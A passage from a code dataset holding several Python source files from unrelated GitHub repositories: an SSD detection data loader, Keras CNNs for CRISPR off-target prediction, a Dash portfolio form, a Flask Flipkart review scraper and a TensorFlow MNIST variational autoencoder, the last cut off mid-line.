np.eye(self.num_classes-1)[np.array(box[:, 4], np.int32)]\n # 拼接后的形状为 (num_box, 4+20)\n box = np.concatenate([boxes, one_hot_label], axis=-1)\n\n box = self.assigin_boxer(box)\n return np.array(image_data), np.array(box)\n\n\n @staticmethod\n def rand(a=0, b=1):\n return np.random.rand()*(b - a) + a\n\n def get_random_data(\n self,\n annotation_line,\n input_shape,\n jitter=.3,\n hue=.1,\n sat=1.5,\n val=1.5,\n is_image_enhance=True\n ):\n # line 表示训练txt文件的某一行\n # 这一行的第一个表示图像的路径,后面的以(x_min, y_min, y_max, y_max, class_idx)表示一个真实框\n line = annotation_line.split()\n # 读取图片并转换为RGB格式\n image = Image.open(line[0])\n image = cvtColor(image)\n # 获取图像的宽,高\n img_w, img_h = image.size\n # 获取输入到SSD网络中图像的高,宽\n h, w = input_shape\n # 提取line后面的真实框,box shape:(num_box, 5)\n box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])\n\n if not is_image_enhance:\n # 将图像的尺寸缩放到输入到SSD网络中的尺寸\n scale = min(w / img_w, h / img_h)\n new_w = int(img_w * scale)\n new_h = int(img_h * scale)\n dx = (w - new_w) // 2\n dy = (h - new_h) // 2\n\n # 将图像resize到指定尺寸\n image = image.resize((new_w, new_h), Image.BICUBIC)\n # 新创建一个图像,全灰色\n new_image = Image.new(mode='RGB', size=(w, h), color=(128, 128, 128))\n # 将图像粘贴到新建图像的中心\n new_image.paste(image, (dx, dy))\n image_data = np.array(new_image, np.float32)\n\n # 将图像的真实框进行对应的缩放,并限制其超出边界\n if len(box) > 0:\n np.random.shuffle(box)\n box[:, [0, 2]] = box[:, [0, 2]] * new_w / img_w + dx\n box[:, [1, 3]] = box[:, [1, 3]] * new_h / img_h + dy\n box[:, 0:2][box[:, 0:2] < 0] = 0\n box[:, 2][box[:, 2] > w] = w\n box[:, 3][box[:, 3] > h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n # 滤除较小的框\n box = box[np.logical_and(box_w > 1, box_h > 1)]\n\n return image_data, box\n\n # 对图��进行缩放并且进行长和宽的扭曲\n new_ar = w / h * self.rand(1 - jitter, 1 + jitter) / self.rand(1 - jitter, 1 + jitter)\n scale = self.rand(0.25, 2)\n if new_ar < 1:\n new_h = int(scale * h)\n new_w = int(new_h * new_ar)\n else:\n new_w = int(scale * w)\n new_h = int(new_w / new_ar)\n\n image = image.resize((new_w, new_h), Image.BICUBIC)\n\n # 将图像多余的部分加上灰条\n dx = int(self.rand(0, w - new_w))\n dy = int(self.rand(0, h - new_h))\n new_image = Image.new(mode='RGB', size=(w, h), color=(128, 128, 128))\n new_image.paste(image, (dx, dy))\n image = new_image\n\n # 翻转图像\n flip = self.rand() < 0.5\n if flip:\n image = image.transpose(Image.FLIP_LEFT_RIGHT)\n\n # 色域扭曲\n hue = self.rand(-hue, hue)\n sat = self.rand(1, sat) if self.rand() < 0.5 else 1 / self.rand(1, sat)\n val = self.rand(1, val) if self.rand() < 0.5 else 1 / self.rand(1, val)\n x = cv2.cvtColor(np.array(image, np.float32), cv2.COLOR_RGB2HSV)\n x[..., 0] += hue * 360\n x[..., 0][x[..., 0] > 1] -= 1\n x[..., 0][x[..., 0] < 0] += 1\n x[..., 1] *= sat\n x[..., 2] *= val\n x[x[:, :, 0] > 360, 0] = 360\n x[:, :, 1:][x[:, :, 1] > 1] = 1\n x[x < 0] = 0\n image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB) * 255\n\n if len(box) > 0:\n np.random.shuffle(box)\n box[:, [0, 2]] = box[:, [0, 2]] * new_w / img_w + dx\n box[:, [1, 3]] = box[:, [1, 3]] * new_w / img_w + dy\n if flip:\n box[:, [0, 2]] = w - box[:, [2, 0]]\n box[:, 0:2][box[:, 0:2] < 0] = 0\n box[:, 2][box[:, 2] > w] = w\n box[:, 3][box[:, 3] > h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n box = box[np.logical_and(box_w > 1, box_h > 1)]\n\n return image_data, box\n\n def iou(self, box):\n \"\"\"\n 计算出当前真实框与所有的先验框的iou,判断真实框与先验框的重合情况\n \"\"\"\n # 真实框与先验框重合部分的左上角和右下角\n inter_leftup = np.maximum(self.anchors[:, :2], box[:2])\n inter_rightbottom = 
np.minimum(self.anchors[:, 2:4], box[2:4])\n # 真实框与先验框重合部分的宽高、面积\n inter_wh = inter_rightbottom - inter_leftup\n inter_wh = np.maximum(inter_wh, 0)\n inter = inter_wh[:, 0] * inter_wh[:, 1]\n # 真实框的面积\n area_true = (box[2] - box[0]) * (box[3] - box[1])\n # 先验框的面积\n area_anchor = (self.anchors[:, 2] - self.anchors[:, 0]) * (self.anchors[:, 3] - self.anchors[:, 1])\n # 计算iou\n union = area_true + area_anchor - inter\n iou = inter / union\n return iou\n\n def encode_box(self, box, return_iou=True, variances=(0.1, 0.1, 0.2, 0.2)):\n \"\"\"\n 计算当前真实框和先验框的重合情况\n \"\"\"\n # iou shape: (num_anchors, ) 每个值代表每个anchor与当前box的iou值\n iou = self.iou(box)\n # encoded_box shape: (num_anchors, 4+1/0)\n # 4+1/0 : 前面4个表示真实要学习的回归参数,最后一个表示正样本anchor与当前真实框的iou值\n encoded_box = np.zeros((self.num_anchors, 4 + return_iou))\n\n # 找到当前真实框重合程度较高的先验框\n assign_mask = iou > self.overlap_threshold\n\n # 如果没有一个先验框重合度大于self.overlap_threshold,则选择重合度最大的为正样本\n if not assign_mask.any():\n assign_mask[iou.argmax()] = True\n\n # 如果返回iou为True的话,将匹配到的正样本anchor的最后一个位置设置为iou值\n if return_iou:\n encoded_box[:, -1][assign_mask] = iou[assign_mask]\n\n # 获取正样本anchors\n assigned_anchors = self.anchors[assign_mask]\n # 计算真实框box的中心和宽高\n box_center = 0.5 * (box[:2] + box[2:])\n box_wh = box[2:] - box[:2]\n # 计算先验框anchor的中心和宽高\n assigned_anchors_center = (assigned_anchors[:, 0:2] + assigned_anchors[:, 2:4]) * 0.5\n assigned_anchors_wh = assigned_anchors[:, 2:4] - assigned_anchors[:, 0:2]\n\n # 根据真实框和先验框计算每个先验框要学习的回归参数信息,variances表示对中心和宽高赋予不同权重\n encoded_box[:, :2][assign_mask] = box_center - assigned_anchors_center\n encoded_box[:, :2][assign_mask] /= assigned_anchors_wh\n encoded_box[:, :2][assign_mask] /= np.array(variances)[:2]\n\n encoded_box[:, 2:4][assign_mask] = np.log(box_wh / assigned_anchors_wh)\n encoded_box[:, 2:4][assign_mask] /= np.array(variances)[2:4]\n\n # 展平后返回,shape:(num_anchors * (4+1/0), )\n return encoded_box.ravel()\n\n def assigin_boxer(self, boxes):\n \"\"\"\n assignment分为3个部分\n - :4 为网络应该有的回归预测结果\n - 4:-1 为先验框所对应的种类,默认为背景\n - -1 为当前先验框是否包含目标\n \"\"\"\n # assignment shape: (num_anchors, 4+21+1)\n assignment = np.zeros((self.num_anchors, 4 + self.num_classes + 1))\n # 初始时每个先验框anchor的背景概率为1\n assignment[:, 4] = 1.0\n if len(boxes) == 0:\n return assignment\n\n # 对每一个真实框都进行iou计算,并对每个真实框匹配到正样本进行编码处理(即计算其回归参数)\n encoded_boxes = np.apply_along_axis(self.encode_box, 1, boxes[:, :4])\n # reshape后,获得的encoded_boxes的shape为:(num_true_box, num_anchors, 4+1),4对应回归参数、1为iou\n encoded_boxes = encoded_boxes.reshape(-1, self.num_anchors, 5)\n\n # 求取每一个先验框重合度最大的真实框\n # best_iou : (num_anchors,) 其值为anchor与box的最大iou值\n # best_iou_idx: (num_anchors,) 其值为anchor与box最大iou值box的索引\n best_iou = encoded_boxes[:, :, -1].max(axis=0)\n best_iou_idx = encoded_boxes[:, :, -1].argmax(axis=0)\n # 保证每一个真实框都有对应的先验框进行匹配,求取每一个真实框重合度最大的先验框\n # box_iou: (num_true_box, ), 其值为box与anchor的最大iou值\n # box_iou_idx: (num_true_box,),其值为box与anchor最大iou值的anchor的索引\n box_iou = encoded_boxes[:, :, -1].max(axis=1)\n box_iou_idx = encoded_boxes[:, :, -1].argmax(axis=1)\n for i in range(len(box_iou_idx)):\n best_iou_idx[box_iou_idx[i]] = i\n best_iou[box_iou_idx[i]] = box_iou[i]\n\n # best_iou_mask: (num_anchors,) 其值是bool,最大iou值大于0为True,反之为False\n best_iou_mask = best_iou > 0\n best_iou_idx = best_iou_idx[best_iou_mask]\n\n # 设置正样本的\n assignment[:, :4][best_iou_mask] = encoded_boxes[best_iou_idx, best_iou_mask, :4]\n # 将正样本的背景概率设置为0\n assignment[:, 4][best_iou_mask] = 0\n # 设置正样本的标签\n assignment[:, 5:-1][best_iou_mask] = boxes[best_iou_idx, 4:]\n # 设置正样本含有物体\n assignment[:, 
-1][best_iou_mask] = 1\n return assignment\n\n\ndef ssd_dataset_collate(batch):\n images = []\n bboxes = []\n for img, box in batch:\n images.append(img)\n bboxes.append(box)\n images = np.array(images)\n bboxes = np.array(bboxes)\n return images, bboxes","repo_name":"codecat0/CV","sub_path":"Object_Detection/SSD/dataset/ssd_dataset.py","file_name":"ssd_dataset.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"31"} +{"seq_id":"74986962648","text":"\"\"\"Convolutional Neural Networks.\n===============================================\nVersion |Date |  Author|  Comment\n-----------------------------------------------\n0.0 | 31 Oct 2020 | J. Charlier | initial version\n0.1 | 11 Nov 2020 | J. Charlier | bug update for 8x23 encoding\n===============================================\n\"\"\"\n#\n#\nimport numpy as np\nimport tensorflow as tf\nfrom keras.utils import to_categorical\n#import tensorflow.python.keras as tfkeras\nfrom tensorflow.keras.losses import categorical_crossentropy\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import (models, layers)\nfrom tensorflow.python.keras.models import Sequential, Model\nfrom tensorflow.python.keras.layers import (\n Conv2D, MaxPooling2D, MaxPool2D,\n concatenate, BatchNormalization, \n Dense, Dropout, Flatten, Input)\nimport matplotlib.pyplot as plt\np = print\nflpath = 'drive/My Drive/crispor/models/'\n#\n#\ndef transformImages(\n xtrain, xtest,\n ytrain, ytest,\n imgrows, imgcols,\n num_classes):\n if K.image_data_format() == 'channels_first':\n xtrain = xtrain.reshape(xtrain.shape[0], 1, imgrows, imgcols)\n xtest = xtest.reshape(xtest.shape[0], 1, imgrows, imgcols)\n input_shape = (1, imgrows, imgcols)\n else:\n xtrain = xtrain.reshape(xtrain.shape[0], imgrows, imgcols, 1)\n xtest = xtest.reshape(xtest.shape[0], imgrows, imgcols, 1)\n input_shape = (imgrows, imgcols, 1)\n xtrain = xtrain.astype('float32')\n xtest = xtest.astype('float32')\n xtrain /= 255\n xtest /= 255\n p('xtrain shape:', xtrain.shape)\n p(xtrain.shape[0], 'train samples')\n p(xtest.shape[0], 'test samples')\n #\n # convert class vectors to binary class matrices\n ytrain = to_categorical(ytrain, num_classes)\n ytest = to_categorical(ytest, num_classes)\n return xtrain, xtest, ytrain, ytest, input_shape\n#\n#\ndef cnnthree(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n cnn3 = Sequential()\n cnn3.add(\n Conv2D(\n 32,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn3.add(MaxPooling2D(pool_size=(2, 2)))\n cnn3.add(Dropout(0.25))\n cnn3.add(Flatten())\n cnn3.add(Dense(128, activation='relu'))\n cnn3.add(Dropout(0.5))\n cnn3.add(Dense(num_classes, activation='softmax'))\n #\n cnn3.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn3 = cnn3.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=epochs,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn3.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn3.history['loss'], label='train loss')\n plt.plot(history_cnn3.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n 
plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn3_4x23'\n )\n else:\n if tl:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn3_8x23'\n )\n else:\n cnn3 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn3crispr_8x23'\n )\n p(\"CNN3: Done\")\n return cnn3\n#\n#\ndef cnnfive(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n # model definition\n cnn5 = Sequential()\n cnn5.add(\n Conv2D(\n 32,\n kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn5.add(Conv2D(64, (1, 1), activation='relu'))\n cnn5.add(MaxPooling2D(pool_size=(2, 2)))\n cnn5.add(Dropout(0.25))\n cnn5.add(Flatten())\n cnn5.add(Dense(128, activation='relu'))\n cnn5.add(Dropout(0.5))\n cnn5.add(Dense(num_classes, activation='softmax'))\n #\n cnn5.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn5layers = cnn5.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=epochs,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn5.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn5layers.history['loss'], label='train loss')\n plt.plot(history_cnn5layers.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn5_4x23'\n )\n else:\n if tl:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn5_8x23'\n )\n else:\n cnn5 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn5crispr_8x23'\n )\n p(\"CNN5: Done\")\n return cnn5\n#\n#\ndef cnnten(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n # model definition\n cnn10 = Sequential()\n cnn10.add(\n Conv2D(\n 32,\n kernel_size=(1, 1),\n padding=\"same\",\n activation='relu',\n input_shape=input_shape\n )\n )\n cnn10.add(MaxPooling2D(pool_size=(2, 2)))\n cnn10.add(Conv2D(64, (1, 1), padding=\"same\", activation='relu'))\n cnn10.add(MaxPooling2D(pool_size=(2, 2)))\n cnn10.add(Dropout(0.25))\n cnn10.add(Flatten())\n cnn10.add(Dense(128, activation='relu'))\n cnn10.add(Dropout(0.5))\n cnn10.add(Dense(64, activation='relu'))\n cnn10.add(Dropout(0.5))\n cnn10.add(Dense(num_classes, activation='softmax'))\n #\n #\n cnn10.compile(\n loss=categorical_crossentropy,\n optimizer=tf.keras.optimizers.RMSprop(0.001, rho=0.9),\n metrics=['accuracy']\n )\n #\n history_cnn10layers = cnn10.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=100,\n verbose=0,\n validation_data=(xtest, ytest),\n callbacks=callbacks\n )\n score = cnn10.evaluate(xtest, ytest, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n #\n if True:\n plt.figure()\n plt.plot(history_cnn10layers.history['loss'], label='train loss')\n plt.plot(history_cnn10layers.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnn10 = 
tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnn10_4x23'\n )\n else:\n if tl:\n cnn10 = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnn10_8x23'\n )\n else:\n cnn10 = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnn10crispr_8x23'\n )\n p(\"CNN10: Done\")\n return cnn10\n#\n#\ndef cnnlin(\n xtrain, ytrain,\n xtest, ytest,\n input_shape, num_classes,\n batch_size, epochs,\n callbacks,\n ismodelsaved=False,\n tl=False):\n if ismodelsaved == False:\n inputs = Input(shape=input_shape, name='main_input')\n conv_1 = Conv2D(10, (1,1), padding='same', activation='relu')(inputs)\n conv_2 = Conv2D(10, (1,2), padding='same', activation='relu')(inputs)\n conv_3 = Conv2D(10, (1,3), padding='same', activation='relu')(inputs)\n conv_4 = Conv2D(10, (1,5), padding='same', activation='relu')(inputs)\n #\n conv_output = concatenate([conv_1, conv_2, conv_3, conv_4])\n bn_output = BatchNormalization()(conv_output)\n pooling_output = MaxPool2D(pool_size=(1,5), strides=None, padding='valid')(bn_output)\n flatten_output = Flatten()(pooling_output)\n #\n x = Dense(100, activation='relu')(flatten_output)\n x = Dense(23, activation='relu')(x)\n x = Dropout(0.15)(x)\n predictions = Dense(num_classes, name='main_output')(x)\n #\n cnnlin = Model(inputs, predictions)\n adamopt = tf.keras.optimizers.Adam(lr=1e-4)\n cnnlin.compile(\n loss='binary_crossentropy', \n optimizer=adamopt,\n metrics=['accuracy']\n )\n #\n history_cnnreplica = cnnlin.fit(\n xtrain, ytrain,\n batch_size=batch_size,\n epochs=20,\n verbose=1,\n validation_data=(xtest, ytest)\n )\n #\n if True:\n plt.figure()\n plt.plot(history_cnnreplica.history['loss'], label='train loss')\n plt.plot(history_cnnreplica.history['val_loss'], label='test loss')\n plt.title('Learning Curves')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.legend()\n plt.show()\n else:\n if np.cumprod(input_shape)[-1] == 92:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_4x23/cnnlinn_4x23'\n )\n else:\n if tl:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_guideseq_8x23/cnnlinn_8x23'\n )\n else:\n cnnlin = tf.keras.models.load_model(\n flpath+'saved_model_crispr_8x23/cnnlinncrispr_8x23'\n )\n p(\"CNN Lin: Done\")\n return cnnlin\n#\n# Last card of module cnns.\n#\n","repo_name":"dagrate/dl-offtarget","sub_path":"experiments/cnns.py","file_name":"cnns.py","file_ext":"py","file_size_in_byte":11170,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24515009009","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc\nfrom dash import html\nfrom dash import dash_table\n\nfrom backend.Portfolio import Ticker\nimport json\nimport pandas as pd\n\n\ndef New_Portfolio(pdb, initial=False):\n\n sectors = pdb.sectors\n currencies = pdb.currencies\n\n # options for the sector Dropdown\n sector_options = []\n for k,v in sectors.items():\n if k!='_id':\n sector_options.append( { 'label':f\"{v} ({k})\",'value':k } )\n \n # options for the currency Dropdown\n currency_options = []\n for k,v in currencies.items():\n if k!='_id':\n currency_options.append( { 'label':v,'value':v } )\n\n # initialize the variable in case of a new portfolio\n initial_portfolio = None\n initial_name = 'portfolio-01'\n initial_df = pd.DataFrame(columns=list(Ticker().dict.keys()))\n\n # in case of editing an existing portfolio load the current data of the portfolio\n if initial:\n initial_name = pdb.current_portfolio.name\n initial_df = 
pdb.current_portfolio.dataframe_representation()\n initial_portfolio = []\n for ticker in pdb.current_portfolio.tickers:\n initial_portfolio.append(ticker.dict)\n \n body = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n html.P(\"Add ticker\"),\n html.P(\"Ticker (Yahoo Finance)\"),\n dbc.Input(id='input-ticker-name'),\n html.P(\"Shares\"),\n dbc.Input(id='input-ticker-shares'),\n html.P(\"Currency\"),\n dcc.Dropdown(\n id='dropdown-ticker-currency',\n options=currency_options,\n value='',\n placeholder=\"Select a currency\"\n ),\n html.P(\"Sector\"),\n dcc.Dropdown(\n id='dropdown-ticker-sector',\n options=sector_options,\n value='',\n placeholder=\"Select an asset class\"\n ),\n dbc.Button(\n \"add / remove\",\n id='button-add_remove',\n ),\n ]),\n dbc.Col(\n [\n html.P(\"Name\"),\n dbc.Input(\n id='input-portfolio_name',\n value=initial_name,\n disabled=True,\n ),\n dbc.Button(\n \"save portfolio\",\n id='button-save_portfolio',\n disabled=True,\n ),\n \n html.Center(\n [\n html.Div(id='table-new_portfolio',\n children=dash_table.DataTable(data=initial_df .to_dict('records'), columns=[{\"name\": i, \"id\": i} for i in initial_df .columns], fill_width=True)\n )\n ]),\n dcc.Store(\n id='storage-temporary-portfolio',\n data=json.dumps(initial_portfolio),\n ),\n html.Div(id=\"portfolio-change\"),\n ]\n ),\n ]\n ),\n ]\n )\n\n layout = html.Div([\n body\n ])\n \n return layout\n \n\n \n","repo_name":"andreariba/Portfolio_app","sub_path":"apps/add_portfolio.py","file_name":"add_portfolio.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72989656409","text":"import ast\nimport os\n\nfrom flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS, cross_origin\nimport requests\nfrom bs4 import BeautifulSoup as bS\nfrom urllib.request import urlopen as uReq\nimport json\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET']) # route to display the home page\n@cross_origin()\ndef homepage():\n return render_template(\"index.html\")\n\n@app.route('/products', methods=['POST', 'GET']) # route to display the product page\n@cross_origin()\ndef index():\n if request.method == 'POST':\n try:\n searchstring = request.form['content'].replace(\" \", \"%20\")\n flipkart_url = \"https://www.flipkart.com/search?q=\" + searchstring\n uclient = uReq(flipkart_url)\n flipkartpage = uclient.read()\n uclient.close()\n flipkart_html = bS(flipkartpage, \"html.parser\")\n bigboxes = flipkart_html.findAll(\"div\", {\"class\": \"bhgxx2 col-12-12\"})\n\n del bigboxes[0:3]\n del bigboxes[-5:]\n alldata = {}\n\n for boxes in bigboxes:\n\n productname = boxes.find(\"div\", {\"class\": \"_3wU53n\"})\n productLinks = \"https://www.flipkart.com\" + boxes.div.div.div.a['href']\n alldata[productname.text] = productLinks\n with open('url.txt', 'w') as file: #dumping the url dict in a txt file\n file.write(json.dumps(alldata))\n\n return render_template(\"links.html\", alldata = alldata)\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n return render_template(\"links.html\")\n else:\n return render_template(\"index.html\")\n\n\n\n@app.route('/review/', methods=['POST', 'GET']) # route to show the review comments in a web UI\n@cross_origin()\ndef review(product):\n try:\n file = open(\"url.txt\", \"r\")\n contents = file.read()\n dictionary = ast.literal_eval(contents)\n productlink = dictionary[product]\n prodRes = requests.get(productlink)\n 
prodRes.encoding = 'utf-8'\n prod_html = bS(prodRes.text, \"html.parser\")\n print(prod_html)\n commentboxes = prod_html.find_all('div', {'class': \"_3nrCtb\"})\n reviews = []\n for commentbox in commentboxes:\n try:\n # name.encode(encoding='utf-8')\n name = commentbox.div.div.find_all('p', {'class': '_3LYOAd _3sxSiS'})[0].text\n except:\n name = 'No Name'\n try:\n # rating.encode(encoding='utf-8')\n rating = commentbox.div.div.div.div.text\n except:\n rating = 'No Rating'\n try:\n # commentHead.encode(encoding='utf-8')\n commentHead = commentbox.div.div.div.p.text\n except:\n commentHead = 'No Comment Heading'\n try:\n comtag = commentbox.div.div.find_all('div', {'class': ''})\n # custComment.encode(encoding='utf-8')\n custComment = comtag[0].div.text\n\n except Exception as e:\n print(\"Exception while creating dictionary: \", e)\n mydict = {\"Product\": product, \"Name\": name, \"Rating\": rating, \"CommentHead\": commentHead,\n \"Comment\": custComment}\n reviews.append(mydict)\n return render_template('results.html', reviews=reviews[0:(len(reviews) - 1)])\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n return render_template('results.html')\n\n\nport = int(os.getenv(\"PORT\"))\nif __name__ == \"__main__\":\n #app.run(host='0.0.0.0', port=5000)\n app.run(host='0.0.0.0', port=port)\n # app.run(host='127.0.0.1', port=8001, debug=True)\n","repo_name":"mahesh9661/FlipkartReviewScrapper","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22833022042","text":"import numpy as np\nimport tensorflow as tf\nimport os, sys, inspect\nimport tensorflow.examples.tutorials.mnist as mnist\nimport pandas as pd\n\nutils_folder = os.path.realpath(\n os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], \"..\")))\nif utils_folder not in sys.path:\n sys.path.insert(0, utils_folder)\n\nimport TensorflowUtils as utils\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_integer(\"z_dim\", \"3\", \"Latent variable dimension\")\ntf.flags.DEFINE_integer(\"batch_size\", \"256\", \"Train batch size\")\ntf.flags.DEFINE_string(\"logs_dir\", \"logs/MNIST_VAE_logs/\", \"Path to logs dir\")\ntf.flags.DEFINE_string(\"activation\", \"relu\", \"Activation function to use in network\")\ntf.flags.DEFINE_float(\"regularization\", \"1e-5\", \"Regularization multiplier value\")\ntf.flags.DEFINE_float(\"learning_rate\", \"1e-3\", \"Learning rate\")\n\nIMAGE_SIZE = 28\nMAX_ITERATIONS = int(1 + 1e5)\nLEARNING_RATE = FLAGS.learning_rate\nNUM_LABELS = 10\n\n\ndef activation_function(x, name=\"\"):\n activation_dict = {'relu': tf.nn.relu(x, name), 'elu': tf.nn.elu(x, name), 'lrelu': utils.leaky_relu(x, 0.2, name),\n 'tanh': tf.nn.tanh(x, name),\n 'sigmoid': tf.nn.sigmoid(x, name)}\n act = activation_dict[FLAGS.activation]\n utils.add_activation_summary(act)\n return act\n\n\ndef encoder_fc(images):\n with tf.variable_scope(\"encoder\") as scope:\n W_fc1 = utils.weight_variable([IMAGE_SIZE * IMAGE_SIZE, 50], name=\"W_fc1\")\n b_fc1 = utils.bias_variable([50], name=\"b_fc1\")\n h_relu1 = activation_function(tf.matmul(images, W_fc1) + b_fc1, name=\"hfc_1\")\n\n W_fc2 = utils.weight_variable([50, 50], name=\"W_fc2\")\n b_fc2 = utils.bias_variable([50], name=\"b_fc2\")\n h_relu2 = activation_function(tf.matmul(h_relu1, W_fc2) + b_fc2, name=\"hfc_2\")\n\n W_fc3 = utils.weight_variable([50, FLAGS.z_dim], name=\"W_fc3\")\n 
b_fc3 = utils.bias_variable([FLAGS.z_dim], name=\"b_fc3\")\n mu = tf.add(tf.matmul(h_relu2, W_fc3), b_fc3, name=\"mu\")\n utils.add_activation_summary(mu)\n\n W_fc4 = utils.weight_variable([50, FLAGS.z_dim], name=\"W_fc4\")\n b_fc4 = utils.bias_variable([FLAGS.z_dim], name=\"b_fc4\")\n log_var = tf.add(tf.matmul(h_relu2, W_fc4), b_fc4, name=\"log_var\")\n utils.add_activation_summary(log_var)\n\n return mu, log_var\n\n\ndef decoder_fc(z):\n with tf.variable_scope(\"decoder\") as scope:\n Wd_fc1 = utils.weight_variable([FLAGS.z_dim, 50], name=\"Wd_fc1\")\n bd_fc1 = utils.bias_variable([50], name=\"bd_fc1\")\n hd_relu1 = activation_function(tf.matmul(z, Wd_fc1) + bd_fc1, name=\"hdfc_1\")\n\n Wd_fc2 = utils.weight_variable([50, 50], name=\"Wd_fc2\")\n bd_fc2 = utils.bias_variable([50], name=\"bd_fc2\")\n hd_relu2 = activation_function(tf.matmul(hd_relu1, Wd_fc2) + bd_fc2, name=\"hdfc_2\")\n\n Wd_fc3 = utils.weight_variable([50, IMAGE_SIZE * IMAGE_SIZE], name=\"Wd_fc3\")\n bd_fc3 = utils.bias_variable([IMAGE_SIZE * IMAGE_SIZE], name=\"bd_fc3\")\n pred_image = tf.matmul(hd_relu2, Wd_fc3) + bd_fc3\n return pred_image\n\n\ndef train(loss_val, var_list):\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n grads = optimizer.compute_gradients(loss_val, var_list=var_list)\n for grad, var in grads:\n utils.add_gradient_summary(grad, var)\n return optimizer.apply_gradients(grads)\n\n\ndef main(argv=None):\n data = mnist.input_data.read_data_sets(\"MNIST_data\", one_hot=False)\n images = tf.placeholder(tf.float32, shape=[None, IMAGE_SIZE * IMAGE_SIZE], name=\"input_image\")\n tf.image_summary(\"Input\", tf.reshape(images, [-1, IMAGE_SIZE, IMAGE_SIZE, 1]), max_images=2)\n\n mu, log_var = encoder_fc(images)\n epsilon = tf.random_normal(tf.shape(mu), name=\"epsilon\")\n z = mu + tf.mul(tf.exp(log_var * 0.5), epsilon)\n\n pred_image = decoder_fc(z)\n entropy_loss = tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits(pred_image, images, name=\"entropy_loss\"), reduction_indices=1)\n tf.histogram_summary(\"Entropy_loss\", entropy_loss)\n pred_image_sigmoid = tf.nn.sigmoid(pred_image)\n tf.image_summary(\"Output\", tf.reshape(pred_image_sigmoid, [-1, IMAGE_SIZE, IMAGE_SIZE, 1]), max_images=2)\n\n KL_loss = -0.5 * tf.reduce_sum(1 + log_var - tf.pow(mu, 2) - tf.exp(log_var), reduction_indices=1)\n tf.histogram_summary(\"KL_Divergence\", KL_loss)\n\n train_variables = tf.trainable_variables()\n for v in train_variables:\n utils.add_to_regularization_and_summary(var=v)\n\n reg_loss = 